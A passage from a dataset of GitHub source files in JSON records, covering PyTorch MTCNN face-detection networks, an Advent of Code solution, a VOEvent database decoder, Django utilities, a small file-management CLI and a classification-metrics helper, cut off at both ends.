2. Funnel breakdown graph to display\n    # ******************************************\n    @action(methods=[\"GET\"], detail=False)\n    def requires_flag_implementation(self, request: Request, *args: Any, **kwargs: Any) -> Response:\n        filter = Filter(request=request, team=self.team).shallow_clone({\"date_from\": \"-7d\", \"date_to\": \"\"})\n\n        warning = requires_flag_warning(filter, self.team)\n\n        return Response({\"result\": warning})\n","repo_name":"PostHog/posthog","sub_path":"ee/clickhouse/views/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":13419,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"}
{"seq_id":"9025559218","text":"import torch\nimport torch.nn as nn\nfrom abc import abstractmethod\nfrom collections import OrderedDict\n\n\nclass Flatten(nn.Module):\n\n    def __init__(self):\n        super(Flatten, self).__init__()\n\n    def forward(self, x):\n        \"\"\"\n        Arguments:\n            x: a float tensor with shape [batch_size, c, h, w].\n        Returns:\n            a float tensor with shape [batch_size, c*h*w].\n        \"\"\"\n\n        # without this pretrained model isn't working\n        x = x.transpose(3, 2).contiguous()\n\n        return x.view(x.size(0), -1)\n\n\nclass BaseNet(nn.Module):\n    def __init__(\n            self,\n    ):\n        super().__init__()\n        self._init_net()\n        self.apply(self.init_weight)\n\n    @staticmethod\n    def init_weight(\n            m\n    ):\n        if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n            nn.init.xavier_uniform(m.weight.data)\n            nn.init.constant(m.bias, 0.1)\n\n    @abstractmethod\n    def _init_net(self):\n        raise NotImplementedError(\n            'Please override this method (_init_net).'\n        )\n\n    @abstractmethod\n    def forward(\n            self,\n            *args,\n            **kwargs\n    ):\n        raise NotImplementedError(\n            'Please override this method (forward).'\n        )\n\n\nclass 
PNet(BaseNet):\n def __init__(\n self,\n ):\n super().__init__()\n\n def _init_net(\n self,\n ):\n # backend\n self.body = nn.Sequential(OrderedDict([\n ('conv1', nn.Conv2d(3, 10, kernel_size=3, stride=1)),\n ('prelu1', nn.PReLU(10)),\n ('pool1', nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)),\n ('conv2', nn.Conv2d(10, 16, 3, 1)),\n ('prelu2', nn.PReLU(16)),\n ('conv3', nn.Conv2d(16, 32, kernel_size=3, stride=1)),\n ('prelu3', nn.PReLU(32))\n ]))\n\n # detection\n self.cls = nn.Sequential(OrderedDict([\n ('conv4-1', nn.Conv2d(32, 2, kernel_size=1, stride=1)),\n # ('softmax', nn.Softmax(1))\n ]))\n # bounding box regresion\n self.box_offset = nn.Sequential(OrderedDict([\n ('conv4-2', nn.Conv2d(32, 4, kernel_size=1, stride=1)),\n ]))\n\n # landmark regression\n self.landmarks = nn.Sequential(OrderedDict([\n ('conv4-2', nn.Conv2d(32, 10, kernel_size=1, stride=1))\n ]))\n\n def forward(\n self,\n x: torch.Tensor,\n *args,\n **kwargs\n ):\n feature_map = self.body(x)\n label = self.cls(feature_map)\n offset = self.box_offset(feature_map)\n landmarks = self.landmarks(feature_map)\n\n return {\n 'cls': label,\n 'pos_offset': offset,\n 'key_point': landmarks\n }\n\n\nclass RNet(BaseNet):\n def __init__(self):\n super().__init__()\n\n def _init_net(self):\n\n self.body = nn.Sequential(OrderedDict([\n ('conv1', nn.Conv2d(3, 28, kernel_size=3, stride=1)),\n ('prelu1', nn.PReLU(28)),\n ('pool1', nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True)),\n\n ('conv2', nn.Conv2d(28, 48, kernel_size=3, stride=1)),\n ('prelu2', nn.PReLU(48)),\n ('pool2', nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True)),\n\n ('conv3', nn.Conv2d(48, 64, kernel_size=2, stride=1)),\n ('prelu3', nn.PReLU(64)),\n\n ('flatten', Flatten()),\n ('conv4', nn.Linear(576, 128)),\n ('prelu4', nn.PReLU(128))\n ]))\n\n # detection\n self.cls = nn.Sequential(OrderedDict([\n ('conv5-1', nn.Linear(128, 2)),\n # ('softmax', nn.Softmax(1))\n ]))\n # bounding box regression\n self.box_offset = nn.Sequential(OrderedDict([\n ('conv5-2', nn.Linear(128, 4))\n ]))\n\n # lanbmark localization\n self.landmarks = nn.Sequential(OrderedDict([\n ('conv5-3', nn.Linear(128, 10))\n ]))\n\n def forward(\n self,\n x: torch.Tensor,\n *args,\n **kwargs\n ):\n # backend\n x = self.body(x)\n\n # detection\n det = self.cls(x)\n box = self.box_offset(x)\n landmarks = self.landmarks(x)\n\n return {\n 'cls': det,\n 'pos_offset': box,\n 'key_point': landmarks\n }\n\n\nclass ONet(BaseNet):\n def __init__(self):\n super().__init__()\n\n def _init_net(self):\n # backend\n\n self.body = nn.Sequential(OrderedDict([\n ('conv1', nn.Conv2d(3, 32, kernel_size=3, stride=1)),\n ('prelu1', nn.PReLU(32)),\n ('pool1', nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True)),\n\n ('conv2', nn.Conv2d(32, 64, kernel_size=3, stride=1)),\n ('prelu2', nn.PReLU(64)),\n ('pool2', nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True)),\n\n ('conv3', nn.Conv2d(64, 64, kernel_size=3, stride=1)),\n ('prelu3', nn.PReLU(64)),\n ('pool3', nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)),\n\n ('conv4', nn.Conv2d(64, 128, kernel_size=2, stride=1)),\n ('prelu4', nn.PReLU(128)),\n\n ('flatten', Flatten()),\n ('conv5', nn.Linear(1152, 256)),\n ('drop5', nn.Dropout(0.25)),\n ('prelu5', nn.PReLU(256)),\n ]))\n\n # detection\n self.cls = nn.Sequential(OrderedDict([\n ('conv6-1', nn.Linear(256, 2)),\n # ('softmax', nn.Softmax(1))\n ]))\n # bounding box regression\n self.box_offset = nn.Sequential(OrderedDict([\n ('conv6-2', nn.Linear(256, 4))\n ]))\n # lanbmark localization\n self.landmarks 
= nn.Sequential(OrderedDict([\n ('conv6-3', nn.Linear(256, 10))\n ]))\n\n def forward(\n self,\n x: torch.Tensor,\n *args,\n **kwargs\n ):\n # backend\n x = self.body(x)\n\n # detection\n det = self.cls(x)\n\n # box regression\n box = self.box_offset(x)\n\n # landmarks regresion\n landmarks = self.landmarks(x)\n\n return {\n 'cls': det,\n 'pos_offset': box,\n 'key_point': landmarks\n }\n\n\nif __name__ == \"__main__\":\n p_net = PNet()\n r_net = RNet()\n o_net = ONet()\n\n x = torch.rand(size=(128, 3, 156, 48))\n o: dict = p_net(x)\n print('p-net:')\n for key, val in o.items():\n print(\"\\t{} --> shape: {}\".format(key, val.shape))\n\n x = torch.rand(size=(128, 3, 24, 24))\n o: dict = r_net(x)\n print('r-net:')\n for key, val in o.items():\n print(\"\\t{} --> shape: {}\".format(key, val.shape))\n\n x = torch.rand(size=(128, 3, 48, 48))\n o: dict = o_net(x)\n print('o-net:')\n for key, val in o.items():\n print(\"\\t{} --> shape: {}\".format(key, val.shape))\n","repo_name":"diyage/AllYouNeed","sub_path":"Package/Task/FacialDetectionAndKeyPoints/MTCNN/Net.py","file_name":"Net.py","file_ext":"py","file_size_in_byte":6888,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"70368820648","text":"import time\n\ndef parse(file_loc):\n \"\"\"\n read input to list\n :param file_loc: file path to AOC input.txt\n \"\"\"\n input = open(file_loc, \"r\").read().split('\\n')\n values=[]\n\n for line in input:\n values.append(line.split(' '))\n\n return values\n\ndef part_1(full_list):\n \"\"\"\n part 1: using the set function, given a list of passcodes we check that the length of the passcode is the\n same length as the set of the passcode\n \"\"\"\n count = 0\n for i in full_list:\n if len(i) == len(set(i)):\n count += 1\n\n return count\n\ndef part_2(full_list):\n \"\"\"\n part 2: To check for anagrams, we sort the characters in each of the string items in a passcode and then uses the\n same method as part 1\n \"\"\"\n count = 0\n for i in full_list:\n sorted_strings = []\n\n # sort the characters in a string\n for strings in i:\n sorted_strings.append(''.join(sorted(strings)))\n\n if len(sorted_strings) == len(set(sorted_strings)):\n count += 1\n\n return count\n\n\ndef main(file_loc):\n\n full_list = parse(file_loc)\n answer = part_1(full_list)\n answer2 = part_2(full_list)\n\n print(f'The answer to part 1 is: {answer}')\n print(f'The answer to part 1 is: {answer2}')\n\n return None\n\n\nif __name__ == '__main__':\n start_time = time.time()\n file_loc = 'input.txt'\n\n main(file_loc)\n\n end_time = time.time()\n print(f'Time taken:{(end_time - start_time)*1000} miliseconds')","repo_name":"siddharth1199/aoc_2017","sub_path":"optum_aoc/2017/day04/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39375922688","text":"import matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport numpy as np\n\nfig = plt.figure()\nax = plt.axes(projection='3d')\n\nx = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])\ny = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])\nz = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])\n\ndef animate_frame(i):\n ax.clear()\n ax.scatter3D(x, y, z, c='r', marker='o')\n\nani = FuncAnimation(fig, animate_frame, frames=30, interval=1, 
repeat=False)\n\nplt.show()\n\n","repo_name":"sidharthmrao/SVM","sub_path":"animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27185286542","text":"'''\ndescription: Create a db entry for a VOEvent\nlicense: APACHE 2.0\nauthor: Ronald van Haren, NLeSC (r.vanharen@esciencecenter.nl)\n'''\nimport voeventparse as vp\nfrom pyfrbcatdb import dbase\nfrom pyfrbcatdb.FRBCat import FRBCat_add\nfrom pyfrbcatdb.FRBCat import parse_mapping\nfrom pyfrbcatdb.logger import logger\nfrom dateutil import parser\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\n\nclass decode_VOEvent(logger):\n '''\n Class to decode a VOEvent file and insert it into the\n FRBCat database.\n\n :param voevent: filestream or filename\n :param dbName: database name\n :param dbHost: database host\n :param dbPort: database port\n :param dbUser: database user name\n :param dbPassword: database user password\n :param logfile: name of log file\n :type voevent: _io.BufferedReader, str\n :type dbName: str\n :type dbHost: str, NoneType\n :type dbPort: str, NoneType\n :type dbUser: str, NoneType\n :type dbPassword: str, NoneType\n :type logfile: str\n '''\n def __init__(self, voevent, dbName, dbHost, dbPort, dbUser,\n dbPassword, logfile):\n logger.__init__(self, logfile)\n self.dbName = dbName\n self.dbHost = dbHost\n self.dbPort = dbPort\n self.dbUser = dbUser\n self.dbPassword = dbPassword\n self.process_VOEvent(voevent)\n\n def process_VOEvent(self, voevent):\n '''\n Main method to process the VOEvent.\n\n :param voevent: filestream or filename\n :type voevent: _io.BufferedReader, str\n '''\n try:\n self.logger.info(\"Processing file {}\".format(voevent.name))\n except AttributeError:\n self.logger.info(\"Processing file {}\".format(voevent))\n # load mapping VOEvent -> FRBCAT\n mapping = parse_mapping()\n # parse VOEvent xml file\n vo_dict, event_type = self.parse_VOEvent(voevent, mapping)\n # create/delete a new FRBCat entry\n self.update_FRBCat(vo_dict, event_type)\n try:\n self.logger.info(\"Finished file {}\".format(voevent.name))\n except AttributeError:\n self.logger.info(\"Finished file {}\".format(voevent))\n\n @staticmethod\n def get_param(param_data, param_group, param_name):\n '''\n Get param data for a given attribute.\n\n :param param_data: all param data from VOEvent file\n :param param_group: param group in VOEvent which holds param_name\n :param param_name: name of parameter to get value for\n :type param_data: orderedmultidict.orderedmultidict.omdict\n :type param_group: str\n :type param_name: str\n :returns: param value if defined in VOEvent, else None\n :rtype: str, float, int, NoneType\n '''\n try:\n # return value of the param if defined in the XML\n return param_data.get(param_group).get(param_name).get('value')\n except AttributeError:\n # return None for the ones that are not defined in the XML\n return None\n\n @staticmethod\n def get_description(v, item):\n '''\n Return description of parameter.\n\n :param v: VOEvent xml\n :param item: single dictionary item from mapping\n :type v: lxml.objectify.ObjectifiedElement\n :type item: dict\n :returns: Description on parameter is applicable, else None\n :rtype: str, NoneType\n '''\n param_group = item.get('param_group')\n param_name = item.get('param_name')\n try:\n note = v.find(\".//Group[@name='{}']\".format(param_group)).find(\n \".//Param[@name='{}']\".format(param_name)).Description\n if note:\n 
return \"[{}] {}\".format(param_name, note)\n else:\n return None\n except AttributeError:\n return None\n\n @staticmethod\n def get_coord(v, coordname):\n '''\n Get coordinate from VOEvent file.\n - transform to HH:MM:SS if coordname=ra\n - transform to DD:HH:SS if coordname=dec\n\n :param v: VOEvent xml\n :param coordname: coordinate name ('ra' or 'dec')\n :type v: lxml.objectify.ObjectifiedElement\n :type coordname: str\n :returns: location string in HH:MM:SS.MS for coordname=ra\n or DD:HH:SS.MS for coordname=dec\n :rtype: str\n '''\n try:\n units = getattr(vp.get_event_position(v, index=0), 'units')\n except AttributeError:\n return None\n if not (units == 'deg'):\n raise AttributeError(\n 'Unable to determine units for position: {}'.format(\n vp.get_event_position(v, index=0)))\n position = vp.get_event_position(v, index=0)\n if (position.system == 'UTC-FK5-GEO'):\n skcoord = SkyCoord(ra=position.ra*u.degree,\n dec=position.dec*u.degree, frame='fk5')\n else:\n # use default reference frame\n skcoord = SkyCoord(ra=position.ra*u.degree,\n dec=position.dec*u.degree)\n if (coordname == 'ra'):\n # ra location is in hms\n coordloc = skcoord.ra.hms\n elif (coordname == 'dec'):\n # dec location is in dms\n coordloc = skcoord.dec.dms\n # format location tuple to string\n locstring = '{}:{}:{}'.format(\n str(int(round(coordloc[0]))).zfill(2),\n str(abs(int(round(coordloc[1])))).zfill(2),\n \"{:.2f}\".format(abs(coordloc[2])).zfill(5))\n return locstring\n\n @staticmethod\n def get_attrib(v, attribname):\n '''\n Get xml attributes.\n\n :param v: VOEvent xml\n :param attribname: attribute name\n :type v: lxml.objectify.ObjectifiedElement\n :type attribname: str\n :returns: v.attrib[attribname]\n :rtype: str\n '''\n try:\n return v.attrib[attribname]\n except ValueError:\n return None\n except KeyError:\n return None\n\n @staticmethod\n def get_utc_time_str(v):\n '''\n Get time in UTC.\n\n :param v: VOEvent xml\n :type v: lxml.objectify.ObjectifiedElement\n :returns: time as string 'YYYY-MM-DD HH:MM:SS.MS'\n :rtype: str\n '''\n utctime = vp.get_event_time_as_utc(v, index=0)\n return utctime.strftime(\"%Y-%m-%d %H:%M:%S.%f\")[:-3]\n\n def get_value(self, v, param_data, item, event_type):\n '''\n Extract the value of item from VOEvent.\n\n :param v: VOEvent xml\n :param param_data: all param data from VOEvent file\n :param item: single dictionary item from mapping\n :param event_type: event type of VOEvent, including\n citation if applicable, e.g. 
('new', None)\n :type v: lxml.objectify.ObjectifiedElement, str\n :type param_data: orderedmultidict.orderedmultidict.omdict\n :type item: dict\n :type event_type: tuple\n :returns: value for item\n :rtype: int, float, str, bool, NoneType\n '''\n itemtype = item.get('type')\n if itemtype == 'ivorn':\n if (event_type[0] == 'supersedes'):\n if event_type[1]:\n # type supersedes with a valid ivorn citation\n return event_type[1]\n else:\n # type supersedes with no ivorn citation, use event ivorn\n return self.get_attrib(v, item.get('name'))\n else:\n return self.get_attrib(v, item.get('name'))\n elif itemtype == 'Param':\n return self.get_param(param_data, item.get('param_group'),\n item.get('param_name'))\n elif itemtype == 'ISOTime':\n try:\n return self.get_utc_time_str(v)\n except AttributeError:\n # for type 'retraction' there is no time defined\n return None\n elif itemtype == 'authortime':\n try:\n timestr = v.xpath('.//' +\n item.get('voevent').replace('.', '/'))[0]\n return parser.parse(str(timestr)).strftime('%Y-%m-%d %H:%M:%S')\n except IndexError:\n return None\n elif itemtype == 'XML':\n return vp.dumps(v)\n elif itemtype == 'voevent':\n try:\n return v.xpath('.//' +\n item.get('voevent').replace('.', '/'))[0]\n except IndexError:\n return None\n elif itemtype == 'Coord':\n return self.get_coord(v, item.get('name'))\n elif itemtype == 'verify':\n # get importance attribute from section\n importance = v.Why.attrib.get(item.get('name'))\n # for high importance set verified=True, else False\n try:\n if (float(importance) >= 0.95):\n # high importance, so default to verified\n return True\n else:\n return False\n except TypeError:\n return False\n else:\n return None\n\n def parse_VOEvent(self, voevent, mapping):\n '''\n Parse VOEvent xml file.\n\n :param voevent: VOEvent xml file\n :param mapping: mapping from mapping.json\n :type voevent: lxml.objectify.ObjectifiedElement, str\n :type mapping: dict\n :returns: mapping (mapping from mapping.json with values filled),\n event_type (event_type and citation if applicable)\n :rtype: dict, tuple\n '''\n # load VOEvent xml file\n try:\n v = vp.load(voevent)\n except AttributeError:\n f = open(voevent, \"rb\")\n v = vp.load(f)\n f.close()\n # assert if xml file is a valid VOEvent\n vp.assert_valid_as_v2_0(v)\n # Check if the event is a new VOEvent\n # For a new VOEvent there should be no citations\n try:\n event_type = (v.xpath('Citations')[0].EventIVORN.attrib['cite'],\n v.xpath('Citations')[0].EventIVORN.text)\n except IndexError:\n event_type = ('new', None)\n self.logger.info(\"Event of of type: {}\".format(event_type))\n # use the mapping to get required data from VOEvent xml\n # if a path is not found in the xml it gets an empty list which is\n # removed in the next step\n # puts all params into dict param_data[group][param_name]\n try:\n param_data = vp.get_grouped_params(v)\n except AttributeError:\n # section is not needed for retractions\n param_data = None\n for table in mapping.keys(): # iterate over all tables\n for idx, item in enumerate(mapping[table]):\n # Add values from XML to dictionary\n mapping[table][idx]['value'] = self.get_value(v, param_data,\n item, event_type)\n if item.get('description'):\n note = self.get_description(v, item)\n if note:\n mapping[table][idx]['note'] = note\n return mapping, event_type\n\n def update_FRBCat(self, mapping, event_type):\n '''\n Add new FRBCat entry. 
Calls the FRBCat_add class.\n\n        :param mapping: mapping from mapping.json\n        :param event_type: event_type and citation if applicable\n        :type mapping: dict\n        :type event_type: tuple\n        '''\n        # connect to database\n        connection, cursor = dbase.connectToDB(self.dbName,\n                                               self.dbUser,\n                                               self.dbPassword,\n                                               self.dbHost,\n                                               self.dbPort)\n        FRBCat = FRBCat_add(connection, cursor, mapping, event_type[0])\n        if event_type[0] in ['new', 'followup', 'supersedes']:\n            # for new, followup, supersedes we need to add an entry to FRBCat\n            FRBCat.add_VOEvent_to_FRBCat()\n        elif event_type[0] in ['retraction']:\n            # retract the event\n            FRBCat.retract(event_type[1])\n","repo_name":"TRASAL/frbcatdb","sub_path":"pyfrbcatdb/decode_VOEvent.py","file_name":"decode_VOEvent.py","file_ext":"py","file_size_in_byte":12325,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"74365139689","text":"from datetime import datetime, timedelta\nfrom random import choice\nfrom django.conf import settings\nfrom rest_framework.exceptions import ValidationError\nfrom django.utils import timezone\nfrom pytz import timezone as pytztz\nfrom rest_framework.fields import DateTimeField\nimport json\nimport decimal\nimport time\nimport urllib\nimport uuid\n\ndef to_date_obj(date_string):\n    for date_fmt in ('%m/%d/%Y', '%m-%d-%y', '%m/%d/%y', '%m-%d-%Y'):\n        try:\n            return datetime.strptime(date_string, date_fmt)\n        except ValueError:\n            pass\n    raise ValidationError('Invalid date format, please enter in MM/DD/YYYY format')\n\ndef format_date(date):\n    return date.strftime('%m/%d/%Y')\n\ndef to_datetime(timestamp_string, silent_fail=False, tz_info=None):\n    for date_fmt in ('%m/%d/%Y %H:%M:%S', '%m-%d-%Y %H:%M:%s', '%m-%d-%y %H:%M:%s' , '%m/%d/%y %H:%M:%s', settings.COMMON_DATE, '%m/%d/%Y %I:%M:%S %p'):\n        try:\n            datetime_obj = datetime.strptime(timestamp_string, date_fmt)\n            if tz_info:\n                datetime_obj = datetime_obj.replace(tzinfo=pytztz(tz_info))\n            return datetime_obj\n        except (ValueError, TypeError):\n            # try the next format instead of failing on the first mismatch\n            pass\n    if not silent_fail:\n        raise ValidationError('Invalid date format, please enter in MM/DD/YYYY hh:mm:ss format')\n    else:\n        return None\n    \ndef generate_random_string(length=8):\n    \"\"\"\n    Generates a random string\n    \"\"\"\n    string = \"THEQUICKBROWNFOXJUMPSOVERTHELAZYDOGthequickbrownfoxjumpsoverthelazydog.-_=$@#!1234567890\"\n    l = lambda: choice(list(string))\n    return ''.join(l() for s in range(length))\n\ndef generate_uuid(name):\n    return uuid.uuid5(uuid.NAMESPACE_DNS, str(name))\n\n\n\n# def send_email(subject, message, recipient_list, fail_silently=True, auth_user=None,\n#                auth_password=None, connection=None, html_message=None, attachments=None,\n#                reply_to=None\n# ):\n#     Mailer().delay(subject=subject, message=message, recipient_list=recipient_list,\n#                    fail_silently=fail_silently, auth_user=auth_user, auth_password=auth_password,\n#                    connection=connection, html_message=html_message, attachments=attachments,\n#                    from_email=settings.EMAIL_FROM_ADDRESS, reply_to=reply_to\n#                    )\n#     return True\n\n# def is_iterable(obj):\n#     iterable = True\n#     try:\n#         object_iterator = iter(obj)\n#     except TypeError, te:\n#         iterable = False\n#     return iterable\n\n# def encrypt(message, key=None):\n#     if not key:\n#         key = settings.ENCRYPTION_KEY\n#\n#     iv = Random.new().read(AES.block_size)\n#     cipher = AES.new(key, AES.MODE_CFB, iv)\n#     msg = iv + cipher.encrypt(message)\n#     return msg.encode(\"hex\")\n#\n# def decrypt(cipher_text, key=None):\n#     if not key:\n#         key = settings.ENCRYPTION_KEY\n#     iv = Random.new().read(AES.block_size)\n#     cipher = AES.new(key, AES.MODE_CFB, iv)\n#     return cipher.decrypt(cipher_text.decode(\"hex\"))[len(iv):]\n\ndef day_validator(value):\n    if not 1 <= value <= 31:\n        raise ValidationError('Invoice Date: Invalid date')\n\ndef string_to_int_list(string):\n    \"\"\"\n    Convert comma separated values of string of integers to list\n    Eg: input \"12, 5,9, 24, qw, ssss\"\n    output : [\"12\", \"5\", \"9\", \"24\"] \n    \"\"\"\n    return filter(lambda l: l.isdigit(), map(lambda d: d.strip(), string.split(',')))\n\ndef timestamped_filename(prefix, extension):\n    params = [prefix] + list(timezone.now().timetuple()) + [extension]\n    return r'{0}_{1}{2}{3}{4}{5}{6}{7}{8}{9}.{10}'.format(*params)\n\n\ndef split_name(name):\n    \"\"\"\n    Splits a name, returns as first name and last name\n    \"\"\"\n    first_name = last_name = \"\"\n    names = filter(lambda t:t.strip(), name.split(' '))\n    \n    if names:\n        first_name = \" \".join(names[:-1]) if len(names) > 1 else names[0]\n        last_name = names[-1] if len(names) > 1 else \"\" \n    \n    return first_name, last_name\n\ndef to_int(obj):\n    \"\"\"\n    Converts any object to number,\n    return None if conversion fails\n    \"\"\"\n    try:\n        number = int(obj)\n    except:\n        number = None\n    return number\n\ndef decode_number(number):\n    return '+' + str(number)\n\nclass ZoneDateTimeField(DateTimeField):\n    def to_representation(self, value):\n        value = timezone.localtime(value)\n        return super(ZoneDateTimeField, self).to_representation(value)\n\n\n\n\ndef check_file_extension(self, file_obj, allowed_extensions):\n    is_valid_image = True\n    \n    file_name = str(file_obj)\n    dot = file_name.rfind(\".\")\n    extension = file_name[dot + 1:]\n    if extension.lower() not in allowed_extensions:\n        is_valid_image = False\n    return is_valid_image\n\ndef geo_code(address):\n    url = 'https://maps.googleapis.com/maps/api/geocode/json?'\n    params = urllib.urlencode({ 'address': address.encode('utf8'), 'key': settings.MAPS_API_KEY})\n    try:\n        response = json.loads(urllib.urlopen(''.join([url, params])).read())\n        lat = response['results'][0]['geometry']['location']['lat']\n        lng = response['results'][0]['geometry']['location']['lng']\n    except Exception:\n        lat = lng = None\n    return lat, lng\n\n\nto_tags = lambda dictionary: [{'id':i, 'name':dictionary[i]} for i in dictionary]\n\n\ndef get_cache():\n    return CacheManager.getInstance().cache\n\nclass DecimalEncoder(json.JSONEncoder):\n    def _iterencode(self, o, markers=None):\n        if isinstance(o, decimal.Decimal):\n            # wanted a simple yield str(o) in the next line,\n            # but that would mean a yield on the line with super(...),\n            # which wouldn't work (see my comment below), so...\n            return (str(o) for o in [o])\n        return super(DecimalEncoder, self)._iterencode(o, markers)\n    \ndef months_between_dates(from_date=None, to_date=None):\n    if not (from_date and to_date):\n        now = time.localtime()\n        return [time.localtime(time.mktime((now.tm_year, now.tm_mon - n,\n                                            1, 0, 0, 0, 0, 0, 0)))[:2] for n in range(6)\n                ]\n    if not to_date:\n        to_date = datetime.today()\n    if not from_date:\n        from_date = (to_date - timedelta(days=30 * 6)).date()\n    iter_month = from_date.month\n    iter_year = from_date.year\n    months_list = []\n    if from_date > to_date:\n        from_date, to_date = to_date, from_date\n    while not(iter_month == to_date.month and iter_year == to_date.year):\n        months_list.append((iter_year, iter_month))\n        iter_month += 1\n        if iter_month > 12:\n            iter_month = 1\n            iter_year += 1\n    months_list.append((iter_year, iter_month))\n    return 
reversed(sorted(months_list, key=lambda x: (x[0], x[1]), reverse=True))\n","repo_name":"saikiranbojan/homely","sub_path":"common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73136038247","text":"def solution(A,B):\n answer = 0\n A = sorted(A)\n B = sorted(B, reverse = True)\n for i in range(len(A)):\n a = A[0]\n b = B[0]\n answer += a * b\n del A[0]\n del B[0]\n return answer","repo_name":"juajang/algorithm","sub_path":"Math/최솟값 만들기.py","file_name":"최솟값 만들기.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1068361784","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\nfrom datetime import datetime\n\n\ndef create_parser():\n \"\"\"Creates parser for command line arguments.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('command', type=str, nargs='*', help='sd')\n return parser\n\n\ndef ls(pathname):\n \"\"\"Command ls.\"\"\"\n if pathname == '':\n pathname = '.'\n return set(os.listdir(pathname)) # noqa: C405\n\n\ndef mk(filename):\n \"\"\"Command mk.\"\"\"\n file_exists = os.path.isfile(filename)\n\n if file_exists:\n return ['error']\n\n try:\n open(filename, 'w').close() # noqa: WPS515\n except Exception:\n return ['error']\n\n return ['create {0}'.format(filename)]\n\n\ndef rm(filename):\n \"\"\"Command rm.\"\"\"\n file_exists = os.path.isfile(filename)\n if file_exists:\n os.remove(filename)\n return ['remove {0}'. format(filename)]\n\n forder_exist = os.path.isdir(filename)\n if forder_exist:\n os.rmdir(filename)\n return ['remove {0}'. format(filename)]\n\n return ['no file or directory to remove']\n\n\ndef contains(path):\n \"\"\"Command contains.\"\"\"\n if path in os.listdir():\n return ['code: 0']\n return ['code: 1']\n\n\ndef since(date, path='.'):\n \"\"\"Command since.\"\"\"\n try:\n date = datetime.strptime(date, '%d-%m-%Y')\n except Exception:\n return set([]) # noqa: C405\n if os.path.isdir(path):\n listdir = os.listdir(path)\n return set([ # noqa: C403\n itm for itm in listdir\n if date < datetime.fromtimestamp(\n os.path.getctime('{0}/{1}'.format(path, itm)),\n )\n ])\n return set([]) # noqa: C405\n\n\ndef main():\n \"\"\"Command to start.\"\"\"\n console_input = create_parser().parse_args().command\n if len(console_input) == 1:\n command = console_input[0]\n argument = ''\n else:\n command, argument = console_input\n\n command_result = globals()[command](argument) # noqa: WPS421\n for res in command_result:\n print(res) # noqa: T001\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sobolevn/itmo-2019","sub_path":"students/revyakinpetr/3/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72557272487","text":"import torch\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\n\ndef compute_metrics(metric_fns,\n prediction,\n target,\n unique_labels=None,\n save_mean=True):\n '''\n Given list of metric functions, calculate metrics for given predictions and targets\n Arg(s):\n metric_fns : list[functions]\n list of metrics to compute\n prediction : N-length np.array or torch.tensor\n model predictions\n target : N-length np.array or torch.tensor\n ground truth values\n unique_labels : list[int] or C-length np.array\n sequence of unique labels\n save_mean : 
bool\n if True, store the average for all per class metrics as well\n\n Returns:\n metrics dict{str : np.array}\n '''\n\n # Create list of metric function names\n metric_fn_names = set()\n for fn in metric_fns:\n metric_fn_names.add(fn.__name__)\n\n # Data structure to store calculated metrics\n metrics = {}\n\n # Convert tensors -> arrays if necessary\n if torch.is_tensor(prediction):\n prediction = prediction.cpu().numpy()\n if torch.is_tensor(target):\n target = target.cpu().numpy()\n\n # Obtain unique labels if not provided\n if unique_labels is None:\n n_classes = np.unique(target).shape[0] # assumes all classes are in target and go from 0 to n_classes - 1\n unique_labels = [i for i in range(n_classes)]\n else:\n n_classes = len(unique_labels)\n\n # Make confusion matrix (rows are true, columns are predicted)\n assert prediction.shape[0] == target.shape[0]\n cmat = confusion_matrix(\n target,\n prediction,\n labels=unique_labels)\n\n # Calculate TP, TN, FP, and FN for each class\n total = np.sum(cmat)\n TPs = np.diag(cmat)\n FPs = np.sum(cmat, axis=0) - TPs\n FNs = np.sum(cmat, axis=1) - TPs\n TNs = total - (TPs + FPs + FNs)\n\n # Store in metrics\n metrics[\"TP\"] = TPs\n metrics[\"TN\"] = TNs\n metrics[\"FPs\"] = FPs\n metrics[\"FNs\"] = FNs\n\n # store whether or not we want to calculate f1\n calculate_f1 = False\n for metric_fn in metric_fns:\n # Obtain metric name\n metric_name = metric_fn.__name__\n\n # Wait to calculate f1 because it depends on precision and recall\n if metric_name == \"f1\":\n calculate_f1 = True\n continue\n\n # Special case for accuracy, predicted_class_distribution\n if metric_name == 'accuracy':\n metrics['accuracy'] = accuracy(prediction, target)\n continue\n elif metric_name == 'predicted_class_distribution':\n metrics[metric_name] = predicted_class_distribution(prediction, n_classes=n_classes)\n continue\n\n # Calculate metric & store\n metric = metric_fn(\n TPs=TPs,\n TNs=TNs,\n FPs=FPs,\n FNs=FNs)\n metrics[metric_name] = metric\n\n # Save average if desired\n if 